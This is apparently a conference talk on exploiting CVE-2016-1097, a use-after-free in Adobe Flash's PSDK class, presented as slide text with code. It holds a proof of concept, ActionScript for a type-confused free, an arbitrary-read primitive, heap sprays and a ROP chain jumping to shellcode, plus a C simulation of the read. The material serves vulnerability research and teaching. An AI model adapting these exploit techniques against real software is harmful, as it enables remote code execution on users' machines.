Use-After-Use-After-Free: Exploit UAF by Generating Your Own
Guanxing Wen
About Me
✤ Security Researcher at Pangu LAB (@hhj4ck)
✤ Enthusiastic about Flash:
  ✤ Advanced vulnerability exploitation
  ✤ Finding vulnerabilities
✤ CVE-2016-1097, Internet Bug Bounty
Agenda
✤ Basics of Flash Exploitation & Mitigation
✤ Overview of CVE-2016-1097
✤ Use-After-Use-After-Free (UAUAF): Go Beyond Mitigation
✤ Building the Exploit from Scratch
✤ Tips for 64-bit Platform & Windows 10 Exploitation
✤ Conclusion
Flash Exploit
✤ Heap Overflow
  [Figure: a vulnerable buffer sits between sprayed Vectors; the overflow rewrites the length of the neighbouring Vector, and the oversized Vector is the Read Primitive]
✤ Use-After-Free
  [Figure: the vulnerable object is freed and its slot is reoccupied by a sprayed Vector; the dangling use then rewrites a Vector length, giving the same Read Primitive]
Mitigations
✤ Length verification
  [Figure: MMgc Vector (vtable, refcount, dummy fields, then the buffer with its length and data); the mitigated layout stores a cookie next to the length, so a length that no longer matches the cookie fails verification before data is indexed]
  [Figure: ByteArray (vtable, refcount, capacity, length, array, copyOnWrite); the mitigated layout adds check_capacity, check_length, check_array and check_copyOnWrite shadow fields that are validated on use]
✤ Isolated Heap
  [Figure: MMgc partitions such as StringBuffer, LargeObjectTracker, JSONSerializer, DataList, GCBitmap, ZCT, MMGCMetaData, FastAllocator, Code, ByteArray; ByteArray & Vector buffers are allocated apart from AS3 objects, so a freed AS3 object slot is not reoccupied by a buffer]
Mitigations
✤ Heap Overflow: Heap Fengshui → Overflow → Read Primitive Gained → Find ROP Gadgets → Fake Vtable - RCE
  blocked by length verification
✤ Use-After-Free: Heap Fengshui → Proper Occupation → Invoke Virtual Method → Read Primitive Gained → Find ROP Gadgets → Fake Vtable - RCE
  blocked by isolated heap
What is really necessary
✤ Read Primitive
  ✤ buffer[index]
  ✤ find ROP gadgets, wrappers
  ✤ index < 0xFFFFFFFF ?
  ✤ buffer = Vector / ByteArray ?
[Figure: String object layout: vtable, refcount, length, buffer, …]
[Figure: the same String with length = 4 and buffer = Address: reading it returns the 4 bytes at Address]
Use-After-Use-After-Free
[Figure: the vulnerable object's slot is occupied by a selected object obj that holds a String (vtable, refcount, length, buffer, …); calling vulnobj.funcX through the stale reference actually runs obj.funcY; once the String's length and buffer fields are overwritten, obj.str is the Read Primitive]
✤ Free: Vulnerable object is released
✤ Use: Occupied with selected object
✤ Free: Release selected object (type-confused call)
✤ Use: Modify the address field via occupation
✤ obj.str becomes a Read Primitive
✤ Free: Release the memory for next occupation
Overview of CVE-2016-1097
com.adobe.tvsdk.mediacore.PSDK
✤ Introduced in Flash Player 19 beta
✤ Eliminated from Flash Player 19 release
✤ Recurred in Flash 21 beta
✤ Undocumented Primetime Player SDK
✤ Found with playerglobal.swc + FFDEC + Beyond Compare
✤ Buggy
CVE-2016-1097
function poc() {
    var ps:PSDK = PSDK.pSDK;   // the singleton is constructed automatically
    ps.release();              // its inner memory is freed, but the atom remains
    ps.createDispatcher();     // use after free through the stale atom
}
Exploit Development
PSDK Class
[Figure: PSDK object, 0x20 bytes: vtable1, vtable2, then dummy fields; the vtable1 entries drawn include ps.createDispatcher() … ~PSDK()]
Proper Occupation
✤ Candidates examined along the PSDK API: com.adobe.mediacore.PSDK → ContentFactory → MediaPlayer → metadata.MetaData → info.Track
✤ Track(name:String, language:String, …)
  [Figure: Track layout as drawn: vtable; name as {length, buffer}; language as {length, buffer}; flags; --]
Type Confusion Call
[Figure: the Track now sits in the 0x20-byte block that held the PSDK; Track.vtable lies where PSDK.vtable1 was and the name ("j") length where vtable2 was; ps.createDispatcher() is dispatched through that memory as if it were still a PSDK, and the confused call ends with the block, i.e. the Track, being released]
Metadata.setByteArray(key:String, obj:ByteArray)
✤ Alloc a temporary space
✤ Do some calculation
✤ Release the temporary space
var mt:Metadata = new Metadata();
var bytes:ByteArray = new ByteArray();
bytes.endian = "littleEndian";         // ByteArray defaults to big-endian; the 64-bit variant later sets this explicitly as well
bytes.length = 0x20;                   // same size as the Track / PSDK block
bytes.position = 0x0C;
bytes.writeInt(4);                     // language.length = 4
var ps:PSDK = PSDK.pSDK;
ps.release();
var track:Track = new Track("j", "lan", true, true);   // proper occupation of the freed PSDK block
ps.createDispatcher();                                 // type-confused call: releases the memory block of Track

Read Primitive
bytes.position = 0x10;
bytes.writeUnsignedInt(0xadd7e555);    // language.buffer = address to read
mt.setByteArray("address", bytes);     // the temporary copy lands on the released Track and is freed again afterwards
var res:String = track.language;       // 4 bytes read from 0xadd7e555
var value:uint = (res.charCodeAt(3) << 24);
value |= (res.charCodeAt(2) << 16);
value |= (res.charCodeAt(1) << 8);
value |= (res.charCodeAt(0));
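The read primitive on these two slides, rebuilt in C as an added example; this is not code from the talk or from the PSDK. It assumes the Track layout drawn above (a vtable, then name and language stored inline as {length, buffer} pairs, then flags), a getter that trusts those two fields, and models Metadata.setByteArray as a plain memcpy over the released Track slot: the free and re-allocation are simulated, not performed. The field offsets come from offsetof so the model builds on a 64-bit host; on the talk's 32-bit target the language pair sits at +0x0C/+0x10, which is where the slide writes 4 and 0xadd7e555. The names, the g_secret target data and the little-endian byte assembly are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout (inferred from the Track drawing): a String field held inline. */
typedef struct {
    uintptr_t      length;   /* how many bytes the getter copies out */
    const uint8_t *buffer;   /* where it copies them from */
} InlineString;

typedef struct {
    const void  *vtable;
    InlineString name;
    InlineString language;
    uint32_t     flags;
} Track;

/* The legitimate getter behind track.language: it trusts length and buffer. */
static size_t track_get_language(const Track *t, uint8_t *out, size_t cap)
{
    size_t n = t->language.length < cap ? (size_t)t->language.length : cap;
    memcpy(out, t->language.buffer, n);
    return n;
}

/* Metadata.setByteArray modelled: the ByteArray is copied into a temporary
 * block of Track size. When that block is the Track's released memory the
 * copy overwrites the Track's fields. Simulation: we write straight into the
 * Track the confused call is assumed to have released. */
static void occupy_with_bytearray(Track *freed_slot, const uint8_t *bytes, size_t len)
{
    if (len > sizeof *freed_slot)
        len = sizeof *freed_slot;
    memcpy(freed_slot, bytes, len);
}

/* The ByteArray: a copy of the live Track with only language.{length,buffer}
 * replaced, so everything else in the object stays intact. */
static void build_payload(uint8_t *payload, const Track *live, uintptr_t addr, uintptr_t len)
{
    size_t off_len = offsetof(Track, language) + offsetof(InlineString, length);
    size_t off_buf = offsetof(Track, language) + offsetof(InlineString, buffer);
    memcpy(payload, live, sizeof(Track));
    memcpy(payload + off_len, &len,  sizeof len);
    memcpy(payload + off_buf, &addr, sizeof addr);
}

/* Arbitrary 32-bit read: length = 4, buffer = addr, then the same byte
 * assembly as the slide's charCodeAt() chain (little-endian host assumed). */
static uint32_t uauaf_read32(Track *track, uintptr_t addr)
{
    uint8_t payload[sizeof(Track)];
    uint8_t out[4] = {0, 0, 0, 0};
    build_payload(payload, track, addr, 4);
    occupy_with_bytearray(track, payload, sizeof payload);
    track_get_language(track, out, sizeof out);
    return (uint32_t)out[0] | ((uint32_t)out[1] << 8) |
           ((uint32_t)out[2] << 16) | ((uint32_t)out[3] << 24);
}

/* Constructed target data standing in for arbitrary process memory. */
static const uint32_t g_secret[2] = { 0x11223344u, 0xCAFEBABEu };

/* One Track reused across calls: every read re-occupies the slot, which is
 * what the final "Free: release the memory for next occupation" step buys. */
static uint32_t demo_read(size_t idx)
{
    static const uint8_t nm[]  = "j";
    static const uint8_t lan[] = "lan";
    static Track track = { NULL, { 1, nm }, { 3, lan }, 0 };
    return uauaf_read32(&track, (uintptr_t)&g_secret[idx & 1]);
}

int main(void)
{
    printf("read32(&g_secret[0]) = 0x%08x\n", demo_read(0));
    printf("read32(&g_secret[1]) = 0x%08x\n", demo_read(1));
    return 0;
}
```

The point the model makes explicit is that the primitive is bounded only by the values written into the two fields: length answers the "index < 0xFFFFFFFF ?" question from the earlier slide (the read is exactly as long as the attacker says), and because the temporary block is freed again after each setByteArray, the same Track can be re-targeted at a new address on every call.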
Code Execution
✤ Spray with Vector.<this>: every element is the `this` atom, so memory fills with the address of the main object
public function spray():void {
    gc_arr = new Array();
    var len:int = (0x1000 - 0x28) / 4;     // elements that fit a 0x1000-byte block after (presumably) 0x28 bytes of Vector header
    for (var i:int = 0; i < 0x10000; i++) {
        gc_arr[i] = new Vector.<Object>();
        for (var j:int = 0; j < len; j++)
            gc_arr[i][j] = this;
    }
}
✤ Find buffers through *this (HT tricks): with the address of `this` known, follow its member slots to the exploit's own objects
var ulimit_bytes:ByteArray;
var output:String;
var track:Track;
var gc_arr:Array;
var fill_bytes:ByteArray;
var shellcode:ByteArray;
✤ Build a fake vtable with gadgets
  [Figure: the PSDK vtable1 (dummy entries … ~PSDK()) is replaced by a fake vtable whose ~PSDK() entry points at the chain below]
  xchg eax, esp # pop esi # pop ebx # retn
  xchg eax, esi # retn
  push 1 # push [eax-8] # push [eax-4] # call wrapper   => jump to shellcode
DEMO

64-bit Exploit
ps = PSDK.pSDK;
ps.release();
ms = new MediaResource("jack", 0x54336677, null);   // proper occupation
try { ps.createDefaultContentFactory(); } catch (e:Error) {}   // type-confused call: releases the memory of MediaResource

var bytes:ByteArray = new ByteArray();
bytes.endian = "littleEndian";
bytes.position = 0x30;
bytes.writeInt(1);
mt.setByteArray("jack", bytes);
✤ Heap Spray: malloced objects rather than MMgc objects (PSDK itself is malloced)
gc_arr = new Array();
ad = new AdClick("", "", "");
ms = new MediaResource("jack", 0x54336677, null);
mt = new MetaData();
for (var i:int = 0; i < 0x80000; i++) {
    gc_arr[i] = new AdAsset("", 1, ms, ad, mt);
}
[Figure: the sprayed AdAsset objects and the MetaData with its Flag field]
64-bit Exploit
[Figure: MetaData object: +0 vtable, +8 dummy, +10 dummy, …, +120 ptr → bucket table indexed by hash*8 → entry (+0 dummy, +8 dummy, +10 ptr) → entry (+0 dummy, +8 dummy, +10 dummy, +18 ptr → bytes)]
hash = func(name), hash in [0, 7]
hash("vtable") = 3
hash("shellc0de") = 4
hash("param") = 0
.setByteArray(name, bytes);
Windows 10 Tips
✤ PSDK is malloced
✤ LFH randomisation
✤ Multiple occupation
ps.release();
for (i = 0; i < 0x100; i++)
    track = new Track("j", "lan", true, true);   // 0x100 candidates so one lands in the freed slot despite LFH randomisation
ps.createAdPolicySelector(1, mp);
Conclusion
✤ The Fix
  ✤ remove the reference manually after release()
  ✤ bypass: declare two of them (CVE-2016-4248)
  ✤ remove the release() from AS3 level
✤ Use-After-Use-After-Free
  ✤ relatively common way to retrieve a Read Primitive
  ✤ replace String with other structure ?= Write Primitive
  ✤ Memory Protector has no effect
Q & A
Thanks for your attention
Download everything from: http://www.hhjack.com/psdk.zip